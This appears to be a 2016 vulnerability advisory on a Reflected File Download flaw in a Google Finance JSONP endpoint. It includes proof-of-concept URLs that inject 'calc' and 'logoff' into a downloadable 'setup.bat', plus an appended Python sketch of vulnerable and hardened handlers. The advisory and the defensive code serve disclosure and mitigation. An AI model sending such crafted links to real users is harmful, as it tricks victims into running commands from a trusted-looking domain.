Google Finance affected by a Reflected File Download (RFD) vulnerability - vulnerability alert - Heiba Security Net (myhack58)

2016-01-26T00:00:00
ID MYHACK58:62201671413
Type myhack58
Reporter Anonymous
Modified 2016-01-26T00:00:00

Description

Portuguese security researcher David Sopas found that Google Finance was affected by a Reflected File Download (RFD) vulnerability. In his account: I discovered this vulnerability while auditing another client. Usually, to exploit RFD you need to set up a page that forces the download; here, Google's own JSON request already did that work for us.

Finding the vulnerability

I came across this request:

    http://www.google.com/finance/info?q=ELI:ALTR&callback=?

It returns the following:

    // [
    {
    "id": "703655"
    ,"t" : "ALTR"
    ,"e" : "ELI"
    ,"l" : "4.71"
    ,"l_fix" : "4.71"
    ,"l_cur" : "€4.71"
    ,"s": "0"
    ,"ltt":"5:35PM GMT+1"
    ,"lt" : "Dec 15, 5:35PM GMT+1"
    ,"lt_dts" : "2015-12-15T17:35:40Z"
    ,"c" : "+0.31"
    ,"c_fix" : "0.31"
    ,"cp" : "7.14"
    ,"cp_fix" : "7.14"
    ,"ccol" : "chg"
    ,"pcls_fix" : "4.396"
    }
    ]

I then wondered whether the callback parameter could be tampered with, so I simply set it to "calc":

    http://www.google.com/finance/info?q=ELI:ALTR&callback=calc

The response was now:

    // calc([
    {
    "id": "703655"
    ,"t" : "ALTR"
    ,"e" : "ELI"
    ,"l" : "4.71"
    ,"l_fix" : "4.71"
    ,"l_cur" : "€4.71"
    ,"s": "0"
    ,"ltt":"5:35PM GMT+1"
    ,"lt" : "Dec 15, 5:35PM GMT+1"
    ,"lt_dts" : "2015-12-15T17:35:40Z"
    ,"c" : "+0.31"
    ,"c_fix" : "0.31"
    ,"cp" : "7.14"
    ,"cp_fix" : "7.14"
    ,"ccol" : "chg"
    ,"pcls_fix" : "4.396"
    }
    ]
    );

Brilliant! I had injected a Windows command into an XHR response. Let's see whether this URL works:

    http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc

It immediately produced a download prompt for a batch file named from the URL. I tried several browsers, and all of the following were affected:

    Firefox (latest version)
    Opera (latest version)
    Internet Explorer 8 and 9

Restrictions

While testing I noticed that most characters are filtered, so only a single command can be used, with no spaces or parameters.

PoC

    http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc
    [when the batch file runs, the calculator opens]

    http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff
    [when the batch file runs, Windows logs the user off]

Attack scenario

The attacker sends the victim the URL:

    http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff

The victim downloads and runs the file. When the batch file executes, the victim is logged out of the operating system.

Video demo
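As an added illustration (not part of the original advisory and not Google's code), the following Python models the reflection pattern described above next to a hardened handler that applies the usual RFD mitigations: refuse path parameters such as ";setup.bat", validate the callback, and pin the download name with Content-Disposition plus X-Content-Type-Options: nosniff. The quote data, the handler signatures and the simplified browser filename model are assumptions; note that the hardened handler still accepts "calc" as a callback (it is a valid identifier), which is exactly why the filename control is the decisive fix.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed sample quote, shaped like the Google Finance JSON shown above.
QUOTE = [{"id": "703655", "t": "ALTR", "e": "ELI", "l": "4.71"}]

# Legitimate JSONP callbacks are JS identifiers, optionally dotted ("window.cb").
# "calc" and "logoff" pass this check: it is necessary, not sufficient.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")


def vulnerable_jsonp(path, query):
    """Reflects the callback verbatim and leaves the download name to the URL,
    which is the pattern the advisory describes (assumed endpoint model)."""
    cb = parse_qs(query).get("callback", [""])[0]
    body = "// %s(%s);" % (cb, json.dumps(QUOTE)) if cb else "// %s" % json.dumps(QUOTE)
    return 200, {"Content-Type": "application/json"}, body


def hardened_jsonp(path, query):
    """RFD controls: refuse path parameters ("/info;setup.bat"), allowlist the
    callback, and pin the filename with Content-Disposition plus nosniff so the
    browser never saves the body under a URL-chosen .bat name."""
    if ";" in path:
        return 404, {"Content-Type": "text/plain"}, "not found"
    cb = parse_qs(query).get("callback", [""])[0]
    if cb and not CALLBACK_RE.fullmatch(cb):
        return 400, {"Content-Type": "text/plain"}, "invalid callback"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "Content-Disposition": 'attachment; filename="info.json"',
        "X-Content-Type-Options": "nosniff",
    }
    body = "%s(%s);" % (cb, json.dumps(QUOTE)) if cb else json.dumps(QUOTE)
    return 200, headers, body


def download_filename(path, headers):
    """Simplified model of how a browser names a download: a quoted
    Content-Disposition filename wins; otherwise the last URL path segment,
    taking the part after ';' (how '/info;setup.bat' became 'setup.bat')."""
    m = re.search(r'filename="([^"]+)"', headers.get("Content-Disposition", ""))
    if m:
        return m.group(1)
    return path.rsplit("/", 1)[-1].rsplit(";", 1)[-1]
```

For detection, the same two signals (a ";" path parameter ending in a script extension together with a callback parameter) are what to look for in web server logs for any JSONP endpoint.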

Google considers this a minor issue with no security impact, but David Sopas disagrees. At the time of writing, this RFD vulnerability has not been fixed.